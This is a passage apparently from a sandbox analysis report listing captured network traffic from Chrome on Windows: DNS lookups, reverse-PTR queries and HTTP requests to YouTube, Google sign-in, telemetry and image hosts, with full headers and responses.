                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                                    Server: gvs 1.0
                                    Date: Sun, 12 Jan 2025 22:19:32 GMT
                                    X-Frame-Options: SAMEORIGIN
                                    X-XSS-Protection: 0
                                    Content-Length: 0
                                  • flag-nl
                                    GET
                                    https://rr2---sn-5hnekn7s.googlevideo.com/generate_204
                                    chrome.exe
                                    Remote address:
                                    74.125.100.39:443
                                    Request
                                    GET /generate_204 HTTP/1.1
                                    Host: rr2---sn-5hnekn7s.googlevideo.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    X-Client-Data: CM2QywE=
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://www.youtube.com/
                                    Accept-Encoding: gzip, deflate, br, zstd
                                    Accept-Language: en-US,en;q=0.9
                                    Response
                                    HTTP/1.1 204 No Content
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                                    Server: gvs 1.0
                                    Date: Sun, 12 Jan 2025 22:19:13 GMT
                                    X-Frame-Options: SAMEORIGIN
                                    X-XSS-Protection: 0
                                    Content-Length: 0
                                  • flag-nl
                                    GET
                                    https://rr2---sn-5hnekn7s.googlevideo.com/generate_204?conn2
                                    chrome.exe
                                    Remote address:
                                    74.125.100.39:443
                                    Request
                                    GET /generate_204?conn2 HTTP/1.1
                                    Host: rr2---sn-5hnekn7s.googlevideo.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    X-Client-Data: CM2QywE=
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://www.youtube.com/
                                    Accept-Encoding: gzip, deflate, br, zstd
                                    Accept-Language: en-US,en;q=0.9
                                    Response
                                    HTTP/1.1 204 No Content
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                                    Server: gvs 1.0
                                    Date: Sun, 12 Jan 2025 22:19:32 GMT
                                    X-Frame-Options: SAMEORIGIN
                                    X-XSS-Protection: 0
                                    Content-Length: 0
                                  • flag-us
                                    DNS
                                    jnn-pa.googleapis.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    jnn-pa.googleapis.com
                                    IN A
                                    Response
                                    jnn-pa.googleapis.com
                                    IN A
                                    142.250.178.10
                                    jnn-pa.googleapis.com
                                    IN A
                                    172.217.169.42
                                    jnn-pa.googleapis.com
                                    IN A
                                    142.250.187.234
                                    jnn-pa.googleapis.com
                                    IN A
                                    216.58.213.10
                                    jnn-pa.googleapis.com
                                    IN A
                                    142.250.187.202
                                    jnn-pa.googleapis.com
                                    IN A
                                    216.58.212.234
                                    jnn-pa.googleapis.com
                                    IN A
                                    142.250.200.10
                                    jnn-pa.googleapis.com
                                    IN A
                                    142.250.200.42
                                    jnn-pa.googleapis.com
                                    IN A
                                    216.58.201.106
                                    jnn-pa.googleapis.com
                                    IN A
                                    216.58.204.74
                                    jnn-pa.googleapis.com
                                    IN A
                                    172.217.169.74
                                    jnn-pa.googleapis.com
                                    IN A
                                    142.250.180.10
                                    jnn-pa.googleapis.com
                                    IN A
                                    172.217.16.234
                                    jnn-pa.googleapis.com
                                    IN A
                                    142.250.179.234
                                  • flag-gb
                                    OPTIONS
                                    https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
                                    chrome.exe
                                    Remote address:
                                    142.250.178.10:443
                                    Request
                                    OPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
                                    host: jnn-pa.googleapis.com
                                    accept: */*
                                    access-control-request-method: POST
                                    access-control-request-headers: content-type,x-goog-api-key,x-user-agent
                                    origin: https://www.youtube.com
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-fetch-mode: cors
                                    sec-fetch-site: cross-site
                                    sec-fetch-dest: empty
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    POST
                                    https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
                                    chrome.exe
                                    Remote address:
                                    142.250.178.10:443
                                    Request
                                    POST /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
                                    host: jnn-pa.googleapis.com
                                    content-length: 24
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    x-user-agent: grpc-web-javascript/0.1
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    content-type: application/json+protobuf
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    x-goog-api-key: AIzaSyDyT5W0Jh49F30Pqqtyfdf7pDLFKLJoAnw
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    origin: https://www.youtube.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSGQmKxNxjKKzyPhIFDfGjW-MhXnk0F9E-J64SGQk8yq_jFOmFmxIFDfGjW-MhXnk0F9E-J64=?alt=proto
                                    chrome.exe
                                    Remote address:
                                    142.250.178.10:443
                                    Request
                                    GET /v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSGQmKxNxjKKzyPhIFDfGjW-MhXnk0F9E-J64SGQk8yq_jFOmFmxIFDfGjW-MhXnk0F9E-J64=?alt=proto HTTP/2.0
                                    host: content-autofill.googleapis.com
                                    x-goog-encode-response-if-executable: base64
                                    x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: none
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: empty
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    accounts.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    accounts.google.com
                                    IN A
                                    Response
                                    accounts.google.com
                                    IN A
                                    142.251.173.84
                                  • flag-us
                                    DNS
                                    play.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    play.google.com
                                    IN A
                                    Response
                                    play.google.com
                                    IN A
                                    142.250.179.238
                                  • flag-gb
                                    OPTIONS
                                    https://play.google.com/log?format=json&hasfast=true&authuser=0
                                    chrome.exe
                                    Remote address:
                                    142.250.179.238:443
                                    Request
                                    OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
                                    host: play.google.com
                                    accept: */*
                                    access-control-request-method: POST
                                    access-control-request-headers: x-goog-authuser
                                    origin: https://www.youtube.com
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-fetch-mode: cors
                                    sec-fetch-site: cross-site
                                    sec-fetch-dest: empty
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    OPTIONS
                                    https://play.google.com/log?format=json&hasfast=true&authuser=0
                                    chrome.exe
                                    Remote address:
                                    142.250.179.238:443
                                    Request
                                    OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
                                    host: play.google.com
                                    accept: */*
                                    access-control-request-method: POST
                                    access-control-request-headers: content-encoding,content-type,x-goog-authuser
                                    origin: https://www.youtube.com
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-fetch-mode: cors
                                    sec-fetch-site: cross-site
                                    sec-fetch-dest: empty
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    74.204.58.216.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    74.204.58.216.in-addr.arpa
                                    IN PTR
                                    Response
                                    74.204.58.216.in-addr.arpa
                                    IN PTR
                                    lhr48s49-in-f101e100net
                                    74.204.58.216.in-addr.arpa
                                    IN PTR
                                    lhr25s13-in-f10�H
                                    74.204.58.216.in-addr.arpa
                                    IN PTR
                                    lhr25s13-in-f74�H
                                  • flag-us
                                    DNS
                                    39.100.125.74.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    39.100.125.74.in-addr.arpa
                                    IN PTR
                                    Response
                                    39.100.125.74.in-addr.arpa
                                    IN PTR
                                    ams17s03-in-f71e100net
                                  • flag-us
                                    DNS
                                    195.187.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    195.187.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    195.187.250.142.in-addr.arpa
                                    IN PTR
                                    lhr25s33-in-f31e100net
                                  • flag-us
                                    DNS
                                    104.219.191.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    104.219.191.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    10.178.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    10.178.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    10.178.250.142.in-addr.arpa
                                    IN PTR
                                    lhr48s27-in-f101e100net
                                  • flag-us
                                    DNS
                                    227.187.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    227.187.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    227.187.250.142.in-addr.arpa
                                    IN PTR
                                    lhr25s34-in-f31e100net
                                  • flag-us
                                    DNS
                                    118.201.58.216.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    118.201.58.216.in-addr.arpa
                                    IN PTR
                                    Response
                                    118.201.58.216.in-addr.arpa
                                    IN PTR
                                    lhr48s48-in-f221e100net
                                    118.201.58.216.in-addr.arpa
                                    IN PTR
                                    prg03s02-in-f118�I
                                    118.201.58.216.in-addr.arpa
                                    IN PTR
                                    prg03s02-in-f22�I
                                  • flag-be
                                    GET
                                    https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en
                                    chrome.exe
                                    Remote address:
                                    142.251.173.84:443
                                    Request
                                    GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en HTTP/2.0
                                    host: accounts.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-dest: iframe
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-be
                                    GET
                                    https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&passive=true&service=youtube&uilel=3&ifkv=AVdkyDkCXvSG36u0zpyERvRHHL7P4FmUijcMgFjapO3HyeW4t0o4SWThLoqq7gwODOSwGX9JbUMVnw
                                    chrome.exe
                                    Remote address:
                                    142.251.173.84:443
                                    Request
                                    GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&passive=true&service=youtube&uilel=3&ifkv=AVdkyDkCXvSG36u0zpyERvRHHL7P4FmUijcMgFjapO3HyeW4t0o4SWThLoqq7gwODOSwGX9JbUMVnw HTTP/2.0
                                    host: accounts.google.com
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-dest: iframe
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-be
                                    GET
                                    https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=AVdkyDnXAHShuldcgFRleM05CGzqH6Rt8JMm1qf1WXxeRJxASq1ufAnjCkAKtbwnMLRoBGOMOSiHpw&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1625554358%3A1736720354892087&ddm=1
                                    chrome.exe
                                    Remote address:
                                    142.251.173.84:443
                                    Request
                                    GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=AVdkyDnXAHShuldcgFRleM05CGzqH6Rt8JMm1qf1WXxeRJxASq1ufAnjCkAKtbwnMLRoBGOMOSiHpw&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1625554358%3A1736720354892087&ddm=1 HTTP/2.0
                                    host: accounts.google.com
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-dest: iframe
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    www.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    www.google.com
                                    IN A
                                    Response
                                    www.google.com
                                    IN A
                                    142.250.187.196
                                  • flag-gb
                                    GET
                                    https://www.google.com/js/th/WuArCo6uiOC32QOIiNWeSH9h2H5vf_jv_ihZ0ZQebSo.js
                                    chrome.exe
                                    Remote address:
                                    142.250.187.196:443
                                    Request
                                    GET /js/th/WuArCo6uiOC32QOIiNWeSH9h2H5vf_jv_ihZ0ZQebSo.js HTTP/2.0
                                    host: www.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    content-autofill.googleapis.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    content-autofill.googleapis.com
                                    IN A
                                    Response
                                    content-autofill.googleapis.com
                                    IN A
                                    142.250.187.234
                                    content-autofill.googleapis.com
                                    IN A
                                    172.217.169.42
                                    content-autofill.googleapis.com
                                    IN A
                                    142.250.200.10
                                    content-autofill.googleapis.com
                                    IN A
                                    216.58.212.202
                                    content-autofill.googleapis.com
                                    IN A
                                    172.217.16.234
                                    content-autofill.googleapis.com
                                    IN A
                                    142.250.179.234
                                    content-autofill.googleapis.com
                                    IN A
                                    142.250.200.42
                                    content-autofill.googleapis.com
                                    IN A
                                    216.58.201.106
                                    content-autofill.googleapis.com
                                    IN A
                                    142.250.180.10
                                    content-autofill.googleapis.com
                                    IN A
                                    142.250.178.10
                                    content-autofill.googleapis.com
                                    IN A
                                    172.217.169.74
                                    content-autofill.googleapis.com
                                    IN A
                                    216.58.204.74
                                    content-autofill.googleapis.com
                                    IN A
                                    216.58.213.10
                                    content-autofill.googleapis.com
                                    IN A
                                    142.250.187.202
                                  • flag-us
                                    DNS
                                    84.173.251.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    84.173.251.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    84.173.251.142.in-addr.arpa
                                    IN PTR
                                    wi-in-f841e100net
                                  • flag-us
                                    DNS
                                    196.187.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    196.187.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    196.187.250.142.in-addr.arpa
                                    IN PTR
                                    lhr25s33-in-f41e100net
                                  • flag-us
                                    DNS
                                    yt3.ggpht.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    yt3.ggpht.com
                                    IN A
                                    Response
                                    yt3.ggpht.com
                                    IN CNAME
                                    photos-ugc.l.googleusercontent.com
                                    photos-ugc.l.googleusercontent.com
                                    IN A
                                    172.217.16.225
                                  • flag-gb
                                    GET
                                    https://yt3.ggpht.com/xOmpjq6EEO00oKM7AdDSnsTzc6AbOOnvbVQVA2hbtfADkg11rbojiT6rJUNuCP1gDsAhm3fp=s48-c-k-c0x00ffffff-no-rj
                                    chrome.exe
                                    Remote address:
                                    172.217.16.225:443
                                    Request
                                    GET /xOmpjq6EEO00oKM7AdDSnsTzc6AbOOnvbVQVA2hbtfADkg11rbojiT6rJUNuCP1gDsAhm3fp=s48-c-k-c0x00ffffff-no-rj HTTP/2.0
                                    host: yt3.ggpht.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://yt3.ggpht.com/a/default-user=s48-c-k-c0x00ffffff-no-rj
                                    chrome.exe
                                    Remote address:
                                    172.217.16.225:443
                                    Request
                                    GET /a/default-user=s48-c-k-c0x00ffffff-no-rj HTTP/2.0
                                    host: yt3.ggpht.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://yt3.ggpht.com/ytc/AIdro_kV2rSsga_TIsj5RGl3LPHQZ2ClGSzyTWeeJiREiSu2NuE=s88-c-k-c0x00ffffff-no-rj
                                    chrome.exe
                                    Remote address:
                                    172.217.16.225:443
                                    Request
                                    GET /ytc/AIdro_kV2rSsga_TIsj5RGl3LPHQZ2ClGSzyTWeeJiREiSu2NuE=s88-c-k-c0x00ffffff-no-rj HTTP/2.0
                                    host: yt3.ggpht.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://yt3.ggpht.com/xOmpjq6EEO00oKM7AdDSnsTzc6AbOOnvbVQVA2hbtfADkg11rbojiT6rJUNuCP1gDsAhm3fp=s88-c-k-c0x00ffffff-no-rj
                                    chrome.exe
                                    Remote address:
                                    172.217.16.225:443
                                    Request
                                    GET /xOmpjq6EEO00oKM7AdDSnsTzc6AbOOnvbVQVA2hbtfADkg11rbojiT6rJUNuCP1gDsAhm3fp=s88-c-k-c0x00ffffff-no-rj HTTP/2.0
                                    host: yt3.ggpht.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    225.16.217.172.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    225.16.217.172.in-addr.arpa
                                    IN PTR
                                    Response
                                    225.16.217.172.in-addr.arpa
                                    IN PTR
                                    lhr48s28-in-f11e100net
                                    225.16.217.172.in-addr.arpa
                                    IN PTR
                                    mad08s04-in-f1�H
                                  • flag-us
                                    DNS
                                    youtube.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    youtube.com
                                    IN A
                                    Response
                                    youtube.com
